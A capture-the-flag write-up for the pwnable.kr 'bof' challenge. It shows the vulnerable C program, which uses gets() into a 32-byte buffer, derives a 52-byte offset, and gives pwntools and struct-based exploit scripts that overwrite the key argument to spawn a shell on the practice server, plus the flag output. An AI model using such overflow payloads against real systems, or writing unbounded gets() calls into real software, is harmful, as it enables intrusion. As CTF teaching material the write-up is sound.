nc pwnable.kr 9000
Source code

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);   /* no length check: input runs past the 32-byte buffer */
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}

int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}
```
1. overflowme is an array of 32 bytes.
2. gets() puts no limit on the length of the input.
3. The shell is only spawned when key == 0xcafebabe.

So this is a stack-overflow pwn: write more than 32 bytes into the buffer so that the overflow reaches the stack slot holding key and changes its value.
Decompiled view (IDA, F5), borrowed from someone else's writeup:

s (the buffer) is at bp-0x2c and a1 (the key argument) is at bp+0x8, so the distance between them is 0x2c + 0x08 = 52 bytes. The 8 bytes between bp and a1 are the saved ebp and the return address, which the overflow also overwrites; that does not matter here because the key check and system("/bin/sh") run before func returns.

Exploit script
```python
from pwn import *

r = remote("pwnable.kr", 9000)
key = 0xcafebabe
# 52 bytes of filler reach key (0x2c up to ebp, then saved ebp and return address),
# followed by the wanted value as a 32-bit little-endian integer.
payload = b"A" * 52 + p32(key)
r.sendline(payload)   # the newline terminates gets()
r.interactive()
```
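The following is an added example, not code from the original writeup or from pwnable.kr. It takes the two offsets read from the decompiler (buffer at ebp-0x2c, key at ebp+0x8), derives the 52-byte padding from them, builds the same payload as the script above with plain struct packing instead of pwntools, and then lays the payload over a constructed model of func()'s 32-bit frame to show what each slot holds afterwards: the saved ebp and return address are clobbered with 0x41414141, and key lands on 0xcafebabe. The frame model, the slot names and the helper functions are assumptions made for illustration; only the two offsets and the target value come from the page.

```python
import struct

# Offsets reported by IDA for func() (from the writeup): overflowme at ebp-0x2c,
# first argument (key) at ebp+0x8 on 32-bit x86 with cdecl calling convention.
BUF_OFF = 0x2c          # distance from the start of overflowme to the saved ebp
SAVED_EBP_SIZE = 4      # [ebp+0] caller's ebp
RET_ADDR_SIZE = 4       # [ebp+4] return address into main
ARG_OFF = 0x8           # [ebp+8] key
TARGET_KEY = 0xcafebabe


def padding_to_arg(buf_off=BUF_OFF, arg_off=ARG_OFF):
    """Number of bytes written from overflowme[0] before reaching key.

    buf_off covers buffer -> saved ebp; arg_off (8) covers the saved ebp and
    the return address, which is why the first argument sits at ebp+8.
    """
    return buf_off + arg_off


def build_payload(key=TARGET_KEY, fill=b"A"):
    """Filler up to key, then key as a 32-bit little-endian value (pwntools p32)."""
    return fill * padding_to_arg() + struct.pack("<I", key)


def simulate_frame(payload, buf_off=BUF_OFF):
    """Constructed model of func()'s frame after gets() copies payload into it.

    This is not a real stack; it only shows which slots the overflow reaches.
    Returns the saved ebp, return address and key slots as integers.
    """
    frame_size = buf_off + SAVED_EBP_SIZE + RET_ADDR_SIZE + 4  # buffer .. key
    frame = bytearray(frame_size)
    frame[:len(payload)] = payload          # gets() copies until the newline
    return {
        "saved_ebp": struct.unpack_from("<I", frame, buf_off)[0],
        "ret_addr": struct.unpack_from("<I", frame, buf_off + SAVED_EBP_SIZE)[0],
        "key": struct.unpack_from("<I", frame, buf_off + ARG_OFF)[0],
    }


if __name__ == "__main__":
    p = build_payload()
    print("padding:", padding_to_arg(), "payload length:", len(p))
    for slot, value in simulate_frame(p).items():
        print(f"{slot:>9}: 0x{value:08x}")
    # Optional: send it to the real service (pwntools is an assumed dependency).
    from pwn import remote
    r = remote("pwnable.kr", 9000)
    r.sendline(p)
    r.interactive()
```

Because the return address is overwritten with 0x41414141, the process will crash once func tries to return, i.e. after the shell exits; until then the check on key has already passed and system("/bin/sh") is running. If a version of the binary checked key after some call that returns, the same payload would need a sane return address in the slot at ebp+4.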
Flag

```
$ python wp.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ ls
$ ls
bof  bof.c  flag  log  log2  super.pl
$ cat flag
daddy, I just pwned a buFFer :)
```